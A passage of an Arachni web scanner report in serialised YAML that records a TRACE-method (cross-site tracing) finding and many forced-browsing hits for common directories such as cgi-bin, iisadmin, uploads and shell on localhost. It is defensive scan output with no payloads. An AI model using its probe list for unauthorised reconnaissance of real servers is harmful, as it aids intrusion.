    OWASP: http://www.owasp.org/index.php/Cross_Site_Tracing
  remedy_guidance: Disable the TRACE method if not required or use input/output validation.
  severity: Medium
  tags: 
  - xst
  - methods
  - trace
  - server
  url: http://localhost:15229/
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "693"
    cwe_url: http://cwe.mitre.org/data/definitions/693.html
    description: |-
      This type of attack can occur when the there
          is an XSS vulnerability and the server supports HTTP TRACE.
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "16"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: XST
    method: TRACE
    mod_name: XST
    name: The TRACE HTTP method is enabled.
    opts: 
      :element: server
      :regexp: ""
    references: 
      CAPEC: http://capec.mitre.org/data/definitions/107.html
      OWASP: http://www.owasp.org/index.php/Cross_Site_Tracing
    regexp: ""
    regexp_match: 
    remedy_guidance: Disable the TRACE method if not required or use input/output validation.
    response: TRACE / HTTP/1.1
    severity: Medium
    tags: 
    - xst
    - methods
    - trace
    - server
    url: http://localhost:15229/
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/_private/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: _private
    injected: _private
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: _private
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/_private/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/_vti_bin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: _vti_bin
    injected: _vti_bin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: _vti_bin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/_vti_bin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/cgi-bin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cgi-bin
    injected: cgi-bin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: cgi-bin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/cgi-bin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/cgi-sys/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cgi-sys
    injected: cgi-sys
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: cgi-sys
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/cgi-sys/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/mailman/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: mailman
    injected: mailman
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: mailman
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/mailman/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/iishelp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: iishelp
    injected: iishelp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: iishelp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/iishelp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/iisadmin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: iisadmin
    injected: iisadmin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: iisadmin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/iisadmin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/uploader/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: uploader
    injected: uploader
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: uploader
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/uploader/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/uploads/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: uploads
    injected: uploads
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: uploads
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/uploads/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/tsweb/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: tsweb
    injected: tsweb
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: tsweb
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/tsweb/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/query/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: query
    injected: query
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: query
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/query/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/recent/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: recent
    injected: recent
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: recent
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/recent/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/cache/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cache
    injected: cache
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: cache
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/cache/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/common/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: common
    injected: common
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: common
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/common/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/wp-content/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: wp-content
    injected: wp-content
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: wp-content
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/wp-content/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/shell/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: shell
    injected: shell
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: shell
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/shell/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/readme/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: readme
    injected: readme
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: readme
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/readme/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/logfiles/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: logfiles
    injected: logfiles
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: logfiles
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/logfiles/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/main/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: main
    injected: main
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: main
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/main/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
